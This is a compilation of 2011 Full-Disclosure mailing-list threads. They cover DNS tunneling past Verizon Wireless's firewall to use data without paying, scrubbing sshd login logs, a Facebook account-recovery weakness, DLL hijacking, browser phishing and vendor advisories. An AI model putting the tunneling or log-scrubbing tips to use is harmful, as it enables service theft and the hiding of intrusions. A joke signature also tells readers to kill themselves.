>> their WIFI.  I've never gotten ICMP tunneling to work myself (outside of a
>> virtual machine),  but I have some code laying around somewhere that can do
>> it just in case I need it for something sometime.  Just thought it would be
>> interesting to some people that it works on such a large provider as
>> Verizon.  The only problem with it that I see is that it's quite slow.  But
>> if it works, so be it.  Good for checking email and browsing the web and
>> such on the road.  But I wouldn't try to torrent a linux distro with it,
>> haha.
>>
>> --oxagast
>>
>> On Fri, Oct 7, 2011 at 7:39 AM, BH  wrote:
>>
>>>  This comes in handy when travelling, I also found a few places where
>>> ICMP tunnelling works well.
>>>
>>>
>>> On 7/10/2011 6:35 PM, Dan Kaminsky wrote:
>>>
>>> Works mostly everywhere.  It's apparently enough of a pain in the butt to
>>> deal with, and abused so infrequently, that it's left alone.
>>>
>>> On Fri, Oct 7, 2011 at 3:32 AM, Marshall Whittaker <
>>> marshallwhitta...@gmail.com> wrote:
>>>
>>>> I recently noticed that you can tunnel TCP through DNS (I used iodine)
>>>> to penetrate Verizon Wireless' firewall.  You can connect, and if you can
>>>> hold the connection long enough to make a DNS tunnel, then the connection
>>>> stays up, then use SSH -D to create a proxy server for your traffic. Bottom
>>>> line is, you can use the internet without paying. I made a video of it.  It
>>>> can be seen here:
>>>> http://www.youtube.com/user/Oxagast?blend=2&ob=5#p/u/0/X6oWESQMVd8 I
>>>> tried to contact Verizon on their security blog about it a few weeks ago at
>>>> http://securityblog.verizonbusiness.com/ however, I have not had a
>>>> response.  This technique still works as of this posting.  Maybe this will
>>>> help them get their act together ;-)
>>>>
>>>>  --oxagast
>>>>
>>>> ___
>>>> Full-Disclosure - We believe in it.
>>>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>>>> Hosted and sponsored by Secunia - http://secunia.com/
>>>>
>>>
>>>
>>>
>>> ___
>>> Full-Disclosure - We believe in it.
>>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>>> Hosted and sponsored by Secunia - http://secunia.com/
>>>
>>>
>>>
>>> ___
>>> Full-Disclosure - We believe in it.
>>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>>> Hosted and sponsored by Secunia - http://secunia.com/
>>>
>>
>>
>> ___
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
>>
>
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Verizon Wireless DNS Tunneling

[James Wright]

I wouldn't say I blindly clicked it, but truth be told, I was not overly
concerned about it (annoyed, but not concerned).  The machine gets wiped and
reinstalled every few months, doing so does not disable my Internet access.
It is dedicated to another purpose, it's not for email, banking, etc.
Sometimes the kids play games on it.  That's about it.  Even my kids have
Linux on their laptops.  Thanks for assuming otherwise, I appreciate your
concern about my home network :)

Why all the hate on Comcast?  I see this a lot on various lists, and besides
their DNS servers being flaky at times (I stopped using their DNS servers
long ago because of this), I personally have not had trouble with them.
Even bittorrent works (gasp) using default settings.  Are they just too big
to be loved?  :)


Thanks,
James


On Fri, Oct 7, 2011 at 10:53 AM,  wrote:

> On Fri, 07 Oct 2011 10:47:13 EDT, Terrence said:
>
> > To the guy saying that comcast  requires an executable to authenticate
> you.
> > Ha. You should prolly wipe your install.
>
> And that's true even if you actually trusted the Comcast binary.  If they
> were
> able to get a binary to get run, probably others have as well.  It either
> got
> automatically run by the browser without your intervention, or it *did*
> prompt
> for execution and you (probably blindly) said "OK".  Either way, you're
> probably
> pwned by something else that got run the exact same way the Comcast binary
> did.
>
> Thanks for nothing, Comcast.  At least we've finally gotten most banks to
> not
> send out phishy-looking email.
>
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Verizon Wireless DNS Tunneling

[James Wright]

Why do you say that?  I don't doubt that there are other ways, but it has
been that way for a while, I've used them as my home ISP for a few years
now.  I don't prefer that method, but you can remove their program after and
you do not lose connectivity or anything.  It just validates your account
number with Comcast and sets your DNS (probably fiddles with other settings
too, not really concerned about it).


Valdis, I have exactly 1 Windows machine, dedicated for something else, but
it came in handy when I last moved.  I would imagine that I could get the
link working via a phone call to support.


Thanks,
James


On Fri, Oct 7, 2011 at 10:47 AM, Terrence  wrote:

> To the guy saying that comcast  requires an executable to authenticate you.
> Ha. You should prolly wipe your install.
> On Oct 7, 2011 10:41 AM,  wrote:
>
>> On Fri, 07 Oct 2011 10:36:39 EDT, James Wright said:
>>
>> > That would probably explain why the Comcast service page downloads an
>> > executable to authenticate you.  At that point they have control over
>> the
>> > end user's machine and can either clear the DNS cache or force a reboot.
>>
>> That must suck if you're a non-Windows user. ;)
>>
>> ___
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
>>
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Verizon Wireless DNS Tunneling

[James Wright]

That would probably explain why the Comcast service page downloads an
executable to authenticate you.  At that point they have control over the
end user's machine and can either clear the DNS cache or force a reboot.

Their (Comcast, other traditional ISP's) authentication is a bit static and
works until real service disruption, which is generally rare.  Though it
would seem that Verizon would do similar.  Either the phone is a paid data
subscriber or they are not.  If not, all traffic is blocked or DNS is
hijacked to display the reason for non-Internet connectivity.

I do not know their system though, so I could be overly simplifying this.


Thanks,
James


On Fri, Oct 7, 2011 at 10:31 AM, Dan Kaminsky  wrote:

> Yeah, the problem is the bad data doesn't flush after authentication.  So
> you try to go to Google, you're redirected to 10.0.0.1, you get
> authenticated, but the browser still tries to go to 10.0.0.1.  You try
> handling those support calls.  So instead most places give you real DNS, and
> hijack at IP/TCP.
>
> On Fri, Oct 7, 2011 at 7:26 AM, James Wright  wrote:
>
>> Actually, yes, they could provide bad data.  I believe (perhaps
>> erroneously) that Comcast does this.  Probably other service providers do
>> too.  Until you are authenticated to use their network you are redirected to
>> a service page that can help authenticate you.  If you have connectivity
>> issues (like bad cached DNS entries) after authenticating you are to reboot
>> (or otherwise clear the local DNS cache).
>>
>> I don't really see why Verizon could not do similar.  All DNS traffic from
>> an unauthenticated user/machine would be redirected to a DNS server that
>> only returned the appropriate service page.  Most or all other traffic would
>> be blocked.  Much like NAC.
>>
>>
>> Thanks,
>> James
>>
>>
>>
>> On Fri, Oct 7, 2011 at 10:05 AM, Dan Kaminsky  wrote:
>>
>>> One major reason it sticks around is -- what are you supposed to do,
>>> return bad data until the user is properly logged in?  It might get cached
>>> -- and while operating systems respect TTL, browsers most assuredly do not
>>> ("well, it MIGHT take us somewhere good").
>>>
>>> It's not like there's a magic off switch that makes this go away.
>>>
>>> On Fri, Oct 7, 2011 at 4:56 AM, Marshall Whittaker <
>>> marshallwhitta...@gmail.com> wrote:
>>>
>>>> Yes, I've found that DNS tunneling works well at the college I go to on
>>>> their WIFI.  I've never gotten ICMP tunneling to work myself (outside of a
>>>> virtual machine),  but I have some code laying around somewhere that can do
>>>> it just in case I need it for something sometime.  Just thought it would be
>>>> interesting to some people that it works on such a large provider as
>>>> Verizon.  The only problem with it that I see is that it's quite slow.  But
>>>> if it works, so be it.  Good for checking email and browsing the web and
>>>> such on the road.  But I wouldn't try to torrent a linux distro with it,
>>>> haha.
>>>>
>>>> --oxagast
>>>>
>>>> On Fri, Oct 7, 2011 at 7:39 AM, BH  wrote:
>>>>
>>>>>  This comes in handy when travelling, I also found a few places where
>>>>> ICMP tunnelling works well.
>>>>>
>>>>>
>>>>> On 7/10/2011 6:35 PM, Dan Kaminsky wrote:
>>>>>
>>>>> Works mostly everywhere.  It's apparently enough of a pain in the butt
>>>>> to deal with, and abused so infrequently, that it's left alone.
>>>>>
>>>>> On Fri, Oct 7, 2011 at 3:32 AM, Marshall Whittaker <
>>>>> marshallwhitta...@gmail.com> wrote:
>>>>>
>>>>>> I recently noticed that you can tunnel TCP through DNS (I used iodine)
>>>>>> to penetrate Verizon Wireless' firewall.  You can connect, and if you can
>>>>>> hold the connection long enough to make a DNS tunnel, then the connection
>>>>>> stays up, then use SSH -D to create a proxy server for your traffic. 
>>>>>> Bottom
>>>>>> line is, you can use the internet without paying. I made a video of it.  
>>>>>> It
>>>>>> can be seen here:
>>>>>> http://www.youtube.com/user/Oxagast?blend=2&ob=5#p/u/0/X6oWESQMVd8 I
>>>>>> tried to contact Verizon on their security blog about it a few weeks ago 
>>>>>> at
>>>

Re: [Full-disclosure] VPN provider helped track down alleged LulzSec member

[James Condron]

On 29 Sep 2011, at 14:04, valdis.kletni...@vt.edu wrote:

> On Thu, 29 Sep 2011 13:53:03 BST, Benji said:
> 
>> Just because something is advertised as 'anonymous' doesnt mean it's 'so
>> anonymous you can break the law' and anyone using a EU/US-related country to
>> do this is either stupid or naive.
> 
> There's also those servers that advertise "anonymous and likely to stay that
> way because we've bought a few corrupt government officials".  But if you're
> buying services from them, you''re neither stupid nor naive, and know 
> *exactly*
> why you're doing business with them

Yep, you're buying a service from someone who can then, by extension, be bought 
themselves. Theres no money in buying off officials, its coming from somewhere- 
usually the highest bidder.

Sounds pretty naive to me.

> 
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] sshd logins without a source

[james]

Guys,

Let's not complicate this.

op: that looks like a line from /var/log/secure - this file only logs sessions, 
escalation and setuids, not ips. It is useful, in this situation, for tracing.

What do /var/log/[b|w]tmp tell you? Use the last command.

If this has been scrubbed then fine- these files can be scrubbed with a simple 
perl 2 liner, or rm'd completely.

Cheers.

Sent from my BlackBerry® wireless device

-Original Message-
From: Bacanu Adrian-Daniel 
Sender: full-disclosure-boun...@lists.grok.org.uk
Date: Fri, 23 Sep 2011 03:05:51 
To: BH; 
full-disclosure@lists.grok.org.uk
Reply-To: Bacanu Adrian-Daniel 
Subject: Re: [Full-disclosure] sshd logins without a source

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Another minor facebook security flaw

[James Fife]

I noticed a recent flaw in Facebooks security resolution process recently. 
After being asked to confirm my identity simply because I was using a different 
computer, I apparently took too long to identify my friends in their photos. 
However, I was able to try two more times before being locked out. In which 
case Facebook provided the exact same photos with the same selection of people 
to name in order to confirm my identity. What this means is that I could 
conceivably attempt to logon to a victims Facebook account from an unauthorized 
device to get such a prompt, and then take my time to research the 
answers.Twenty minutes was the approximate time before my session expired, 
which gives roughly one hour to come up with the answers. This may not seem 
terribly difficult given the proclivity with which people tag their friends or 
publish photos on blogs. It would be even easier if the victim and attacker had 
a mutual friend in common on Facebook, as they
 would likely be able to see a lot more photos. In fact, perhaps even searching 
each name in Facebook could show the face, which would allow for the questions 
to be answered correctly.This isn’t a minor flaw in any sense of the word, 
however it does seem quite possibly that the process as it is now implemented 
could be abused in conjunction with other vulnerabilities to gain access to 
someone’s account. I hope that at the least this will foster some interesting 
discussion on why what I have described is a non issue, or result in a fix.
Taken from : 
http://allthatiswrong.wordpress.com/2011/09/19/another-minor-facebook-security-issue/
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Cybsec Advisory 2011 0901 Windows Script Host DLL Hijacking

[James Condron]

Paul,

I only run windows on one machine, my workstation in the office, so my results 
aren't indicative of every system- indeed this may be a quirk of our AD, in 
which case I'll be talking to one of my colleagues with my friend Mr. Crowbar, 
but both extensions you list were executable.

Admittedly I haven't checked all of the others yet, mileage may vary.

Either way there is no accounting for taste; some cases will make this less an 
attack in and of its self and more will show this as a further social 
engineering payload, albeit one which requires tricking someone to download 
several layers of code and still executing it.

On 4 Sep 2011, at 23:54, paul.sz...@sydney.edu.au wrote:

>> Application: wscript.exe
>> Extensions: js, jse, vbe, vbs, wsf, wsh
>> Library: wshesn.dll
> 
> Many people commented that the above extensions are "executable"
> already, so are (should be) treated with caution, or that they
> can be trojaned directly without any DLL load shenanigans.
> 
> However... looking at
> http://technet.microsoft.com/en-us/library/cc288335%28office.12%29.aspx
> http://office.microsoft.com/en-us/windows-sharepoint-services-help/types-of-files-that-cannot-be-added-to-a-list-or-library-HA010100147.aspx
> I do not see JS listed as executable, though JSE is listed.
> 
> Looking at
> http://msdn.microsoft.com/en-us/library/ms722429.aspx
> I see JS (but not JSE) listed. Checking secpol.msc on my WindowsXP
> machine, none of the above extensions are "designated".
> 
> Maybe DLL hijacking is useful for some of these file types, after all?
> 
> Cheers, Paul
> 
> Paul Szabo   p...@maths.usyd.edu.au   http://www.maths.usyd.edu.au/u/psz/
> School of Mathematics and Statistics   University of SydneyAustralia
> 
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] http://www.bestcareersopportunities.com/

[James Voss]

Find another list to cry to.

We don't deal with things like that here.

Sent from my Verizon Wireless BlackBerry

-Original Message-
From: Jacqui Caren-home 
Sender: full-disclosure-boun...@lists.grok.org.uk
Date: Wed, 31 Aug 2011 07:30:22 
To: 
Subject: [Full-disclosure] http://www.bestcareersopportunities.com/

is running wordpress 3.2.1

This lahore based spammer is running a PPC link blog and is pushing his crap
all over the social networks right now and has just appeared in my work
spamtraps from botnett'd systems.

Anyone know if the above site has any known exploits?

Note the hosting company has been notified, so expect any attacks/tests to be 
monitored.

Jacqui

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Paper - Dissecting Java Server Faces for Penetration Testing

[James Rankin]

Er.on the end of the link, maybe?

On 26 August 2011 14:39, Saleh  wrote:

> On 08/26/2011 05:18 AM, SecNiche Security Labs wrote:
> > Hi
> >
> > This paper sheds light on the findings of security testing of Java
> > Server Faces. JSF has been widely used as an open source web framework
> > for developing efficient applications using J2EE. JSF is compared with
> > ASP.NET framework to unearth potential security flaws.
> >
> > Link : http://www.secniche.org/jsf/dissecting_jsf_pt_aks_kr.pdf
> >
> > Aditya K Sood
> > SecNiche Security Labs
> > http://www.secniche.org
> >
> > ___
> > Full-Disclosure - We believe in it.
> > Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> > Hosted and sponsored by Secunia - http://secunia.com/
> Where's the paper?
>
> --
> Saleh Alsanad
> PACI computer engineer
> q8mos...@gmail.com
> I'm an FSF member -- Help us support software freedom!
> http://www.fsf.org/jf?referrer=2442
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>



-- 
"On two occasions...I have been asked, 'Pray, Mr Babbage, if you put into
the machine wrong figures, will the right answers come out?' I am not able
rightly to apprehend the kind of confusion of ideas that could provoke such
a question."

** IMPORTANT INFORMATION/DISCLAIMER *

This document should be read only by those persons to whom it is addressed.
If you have received this message it was obviously addressed to you and
therefore you can read it, even it we didn't mean to send it to you.
However, if the contents of this email make no sense whatsoever then you
probably were not the intended recipient, or, alternatively, you are a
mindless cretin; either way, you should immediately kill yourself and
destroy your computer (not necessarily in that order). Once you have taken
this action, please contact us.. no, sorry, you can't use your computer,
because you just destroyed it, and possibly also committed suicide
afterwards, but I am starting to digress.. *

* The originator of this email is not liable for the transmission of the
information contained in this communication. Or are they? Either way it's a
pretty dull legal query and frankly one I'm not going to dwell on. But
should you have nothing better to do, please feel free to ruminate on it,
and please pass on any concrete conclusions should you find them. However,
if you pass them on via email, be sure to include a disclaimer regarding
liability for transmission.
*

* In the event that the originator did not send this email to you, then
please return it to us and attach a scanned-in picture of your mother's
brother's wife wearing nothing but a kangaroo suit, and we will immediately
refund you exactly half of what you paid for the can of Whiskas you bought
when you went to Pets** ** At Home yesterday. *

* We take no responsibility for non-receipt of this email because we are
running Exchange 5.5 and everyone knows how glitchy that can be. In the
event that you do get this message then please note that we take no
responsibility for that either. Nor will we accept any liability, tacit or
implied, for any damage you may or may not incur as a result of receiving,
or not, as the case may be, from time to time, notwithstanding all
liabilities implied or otherwise, ummm, hell, where was I...umm, no matter
what happens, it is NOT, and NEVER WILL BE, OUR FAULT! *

* The comments and opinions expressed herein are my own and NOT those of my
employer, who, if he knew I was sending emails and surfing the seamier side
of the Internet, would cut off my manhood and feed it to me for afternoon
tea. *
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] CA20110809-01: Security Notice for CA ARCserve D2D

[Williams, James K]

 
CA20110809-01: Security Notice for CA ARCserve D2D
 

Issued:  August 9, 2011
 

CA Technologies support is alerting customers to a security risk 
associated with CA ARCserve D2D. A vulnerability exists that can 
allow a remote attacker to access credentials and execute arbitrary 
commands.  CA Technologies has issued a patch to address the 
vulnerability.
 
The vulnerability, CVE-2011-3011, is due to improper session handling. 
A remote attacker can access credentials and execute arbitrary 
commands.
 

Risk Rating 
 
High
 

Platform 
 
Windows
 

Affected Products 
 
CA ARCserve D2D r15
 

How to determine if the installation is affected 
 
Search under TOMCAT directory for "BaseServiceImpl.class", and if the 
date is earlier than August 03, 2011, then you should apply fix 
RO33517.
 

Solution
 
CA has issued a patch to address the vulnerability.
 
CA ARCserve D2D r15:
RO33517
 

Workaround

None
 

References
 
CVE-2011-3011 - CA ARCserve D2D session handling vulnerability
 

Acknowledgement
 
None
 

Change History
 
Version 1.0: Initial Release

 
If additional information is required, please contact CA Technologies 
Support at support.ca.com
 
If you discover a vulnerability in a CA Technologies product, please 
report your findings to the CA Technologies Product Vulnerability 
Response Team.
support.ca.com/irj/portal/anonymous/phpsupcontent?contentID=177782
 

Thanks and regards,
Ken Williams, Director
ca technologies Product Vulnerability Response Team
ca technologies Business Unit Operations
wilja22 @ ca.com
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] URL Spoofing vulnerability in different browsers

[James Voss]

Lol, okay

-- 
Regards,

James Voss 
LinkedIn: http://www.linkedin.com/in/jameswvoss
312-000- - Direct
847-000- - Fax

PRIVILEGED AND CONFIDENTIAL: This communication, including attachments, is
for the exclusive use of addressee and may contain proprietary, confidential
and/or privileged information. If you are not the intended recipient, any
use, copying, disclosure, dissemination or distribution is strictly
prohibited. If you are not the intended recipient, please notify the sender
immediately by return e-mail, delete this communication and destroy all
copies.

On Fri, Jul 22, 2011 at 4:15 PM, Chris Truncer <
ctrun...@christophertruncer.com> wrote:

> Just ignore Mustlive. The rest of the list does.
>
>
>
> On Jul 22, 2011, at 4:08 PM, Chris Evans  wrote:
>
> > On Fri, Jul 22, 2011 at 8:36 AM, MustLive 
> wrote:
> >> Hello list!
> >>
> >> I want to warn you about URL Spoofing vulnerability in Mozilla Firefox,
> >> Internet Explorer, Google Chrome, Opera and other browsers. I found it
> long
> >> time ago, at 6th of February 2008, just after finding of built-in CSRF
> >> vulnerability in Mozilla and Firefox (it's funky CSRF attack via
> prefetching
> >> functionality), which I described at my site in March.
> >>
> >> -
> >> Affected products:
> >> -
> >>
> >> Vulnerable are all browsers which support Basic/Digest Authentication.
> It's
> >> all modern browsers and many from old browsers. In particular affected
> are
> >> Mozilla Firefox 3.0.19, 3.5.11, 3.6.8, Firefox 4.0b2 (and Mozilla and
> all
> >> other Gecko-based browsers), Internet Explorer 6, 7, 8, Google Chrome
> >> 1.0.154.48 and Opera 10.62 and previous and next versions of these
> browsers.
> >> And other browsers which support Basic/Digest Authentication.
> >>
> >> In March, after my informing, Mozilla opened Bug 647010 in Bugzilla
> >> (https://bugzilla.mozilla.org/show_bug.cgi?id=647010).
> >>
> >> Among four browsers developers informed by me only Mozilla said, that
> they
> >> are planning to fix this vulnerability (without specifying the time).
> Google
> >> even didn't answer me, but in June they informed in their blog
> >> (
> http://blog.chromium.org/2011/06/new-chromium-security-features-june.html
> ),
> >> that they fixed this vulnerability in browsers Chrome 13 (it's now beta
> >> version) and higher.
> >>
> >> --
> >> Details:
> >> --
> >>
> >> This is better to call attack, then vulnerability, because it's using
> >> built-in browsers functionality (and its intended behavior) to attack
> users
> >> of web sites. This attack allows to conduct phishing attacks on users of
> web
> >> sites - in this case phishing is doing not at other (phishing) sites,
> not
> >> with using of holes of target sites (like reflected XSS or persistent
> XSS),
> >> but with using of browsers functionality (and allowed functionality of
> >> target sites to place external content).
> >>
> >> I called this attack as Onsite phishing (or Inline phishing). It can be
> used
> >> (including by phishers) for stealing of logins and passwords of users of
> web
> >> sites.
> >>
> >> As I've tested, a lot of different methods (with using of tags and CSS),
> >> which allow to make cross-site requests, can be used to conduct this
> attack.
> >> Except prefetching (in all Gecko-based browsers which support
> prefetching
> >> functionality), which doesn't show Authentication window at receiving of
> 401
> >> response from web server. The next methods can be used:
> >>
> >> Tags img, script, iframe, frame, embed, link (css) - Mozilla, Firefox,
> IE,
> >> Google Chrome and Opera.
> >> Tag object - Internet Explorer, Google Chrome and Opera.
> >> CSS (inline, in html files, in external css files): such
> >> as -moz-binding:url - Mozilla and Firefox < 3.0, such as
> >> background-image:url - in all browsers.
> >>
> >> Here are screenshots of the attack in different browsers (in Firefox
> 3.0.19,
> >> 3.5.x, 3.6.x. 4.0b2 the dialog window looks almost equally):
> >>
> >> http://websecurity.com.ua/uploads/2011/03/Attack%20on%20Mozilla.png
> >> http://websecurity.com.ua/uploads/2011/03/Attack%20on%20Firefox.png
> >> http://websecurity.com.ua/uploads/2011/03/Attack%20on%20IE6.png

Re: [Full-disclosure] Encrypted files and the 5th amendment

[james]

The police are on their way

--Original Message--
From: Abdelkader Boudih
Sender: full-disclosure-boun...@lists.grok.org.uk
To: full-disclosure@lists.grok.org.uk
Subject: Re: [Full-disclosure] Encrypted files and the 5th amendment
Sent: 12 Jul 2011 19:40

Why everybody must cares about the American Constitution, as far as i 
know this apply to it's citizen only and the rest of the world is not 
protected! I don't understand why we all should respect it while USA 
never respect the other constitutions! If i decide to encrypt my data 
and forget the password, how they could force me to decrypt it! I 
recently found a 234mb encrypted truecrypt file in my HD, i don't even 
remember what and when i created it and which keyfile i used!




___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Sent from my BlackBerry® wireless device
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Encrypted files and the 5th amendment

[James Rankin]

That is true in the UK. See

http://www.pcpro.co.uk/news/361693/teenager-jailed-for-refusing-to-reveal-encryption-keys


On 12 July 2011 17:52, Thor (Hammer of God)  wrote:

>  I’m sure many of us will be following this closely:
>
> ** **
>
>
> http://news.cnet.com/8301-31921_3-20078312-281/doj-we-can-force-you-to-decrypt-that-laptop/
> 
>
> ** **
>
> I understand that in the UK, one can be prosecuted for not turning over
> actual encryption keys to .gov -  Is that correct?
>
> ** **
>
> T
>
> ** **
>
> *There’s no reason to think “outside the box” *
>
> *if you don’t think yourself into it. *
>
> * *
>
> *Order “Thor’s Microsoft Security 
> Bible”
> *
>
> * *
>
> * *
>
> *Timothy Thor Mullen
> http://www.hammerofgod.com*
>
> ** **
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>



-- 
"On two occasions...I have been asked, 'Pray, Mr Babbage, if you put into
the machine wrong figures, will the right answers come out?' I am not able
rightly to apprehend the kind of confusion of ideas that could provoke such
a question."

** IMPORTANT INFORMATION/DISCLAIMER *

This document should be read only by those persons to whom it is addressed.
If you have received this message it was obviously addressed to you and
therefore you can read it, even it we didn't mean to send it to you.
However, if the contents of this email make no sense whatsoever then you
probably were not the intended recipient, or, alternatively, you are a
mindless cretin; either way, you should immediately kill yourself and
destroy your computer (not necessarily in that order). Once you have taken
this action, please contact us.. no, sorry, you can't use your computer,
because you just destroyed it, and possibly also committed suicide
afterwards, but I am starting to digress.. *

* The originator of this email is not liable for the transmission of the
information contained in this communication. Or are they? Either way it's a
pretty dull legal query and frankly one I'm not going to dwell on. But
should you have nothing better to do, please feel free to ruminate on it,
and please pass on any concrete conclusions should you find them. However,
if you pass them on via email, be sure to include a disclaimer regarding
liability for transmission.
*

* In the event that the originator did not send this email to you, then
please return it to us and attach a scanned-in picture of your mother's
brother's wife wearing nothing but a kangaroo suit, and we will immediately
refund you exactly half of what you paid for the can of Whiskas you bought
when you went to Pets** ** At Home yesterday. *

* We take no responsibility for non-receipt of this email because we are
running Exchange 5.5 and everyone knows how glitchy that can be. In the
event that you do get this message then please note that we take no
responsibility for that either. Nor will we accept any liability, tacit or
implied, for any damage you may or may not incur as a result of receiving,
or not, as the case may be, from time to time, notwithstanding all
liabilities implied or otherwise, ummm, hell, where was I...umm, no matter
what happens, it is NOT, and NEVER WILL BE, OUR FAULT! *

* The comments and opinions expressed herein are my own and NOT those of my
employer, who, if he knew I was sending emails and surfing the seamier side
of the Internet, would cut off my manhood and feed it to me for afternoon
tea. *
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] You a trollin'

[James Matthews]

Yes you are trolling...

On Mon, Jul 4, 2011 at 12:27 PM, t0hitsugu  wrote:

> Am I right? ;D
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>



-- 
http://www.theboxery.com

--
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] NiX API

[James Rankin]

>> It definitely does something

Well, what?
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] CA20110420-02: Security Notice for CA Output Management Web Viewer

[Williams, James K]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

CA20110420-01: Security Notice for CA SiteMinder


Issued:  April 20, 2011
Updated:  May 19, 2011


CA Technologies support is alerting customers to a security risk 
associated with CA SiteMinder. A vulnerability exists that can allow a 
malicious user to impersonate another user.  CA Technologies has 
issued patches to address the vulnerability.

The vulnerability, CVE-2011-1718, is due to improper handling of 
multi-line headers. A malicious user can send specially crafted data 
to impersonate another user.


Risk Rating 

Medium


Platform 

Windows


Affected Products 

CA SiteMinder R6 IIS 6.0 Web Agents prior to R6 SP6 CR2
CA SiteMinder R12 IIS 6.0 Web Agents prior to R12 SP3 CR2


How to determine if the installation is affected 

Check the Web Agent log to obtain the installed release version. Note 
that the "webagent.log" file name is configurable by the SiteMinder 
administrator.


Solution

CA has issued patches to address the vulnerability.

CA SiteMinder R6:
Upgrade to R6 SP6 CR2 or later

CA SiteMinder R12: 
Upgrade to R12 SP3 CR2 or later

CR releases can be found on the CA SiteMinder Hotfix / Cumulative 
Release page:
(URL may wrap)
support.ca.com/irj/portal/anonymous/phpdocs?filePath=0/5262/5262_fixinde
x.h
tml


References

CVE-2011-1718 - CA SiteMinder Multi-line Header Vulnerability


Acknowledgement

April King (ap...@twoevils.org)


Change History

Version 1.0: Initial Release
Version 1.1: Updated Affected Products section to clarify that only 
 the IIS 6.0 Web Agents are affected.  ISS 7 is not 
 affected by this issue.


If additional information is required, please contact CA Technologies 
Support at https://support.ca.com.

If you discover a vulnerability in a CA Technologies product, please 
report your findings to the CA Technologies Product Vulnerability 
Response Team.
support.ca.com/irj/portal/anonymous/phpsupcontent?contentID=177782

-BEGIN PGP SIGNATURE-
Version: PGP Desktop 9.9.1 (Build 287)
Charset: utf-8

wj8DBQFN1UDNeSWR3+KUGYURAuwVAJ4imZZZtXVKli8gWinrjky3gheQCwCghM/N
69B1MXsPDg5Gt3ICQg4U7vc=
=uuIC
-END PGP SIGNATURE-

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Sony: No firewall and no patches

[James Matthews]

Most security certifications are a mockery of entire industry.

On Mon, May 9, 2011 at 7:33 PM, Ivan .  wrote:

> I guess that makes a mockery of the PCI DSS framework!
>
> On Tue, May 10, 2011 at 9:03 AM, Thor (Hammer of God) <
> t...@hammerofgod.com> wrote:
>
>>  Maybe they should call that "You don't have to patch" genius!  Lol
>>
>>
>> http://www.eweek.com/c/a/Security/Sony-Networks-Lacked-Firewall-Ran-Obsolete-Software-Testimony-103450/
>>
>>
>> Sent from my Windows Phone
>>
>> ___
>> Full-Disclosure - We believe in it.
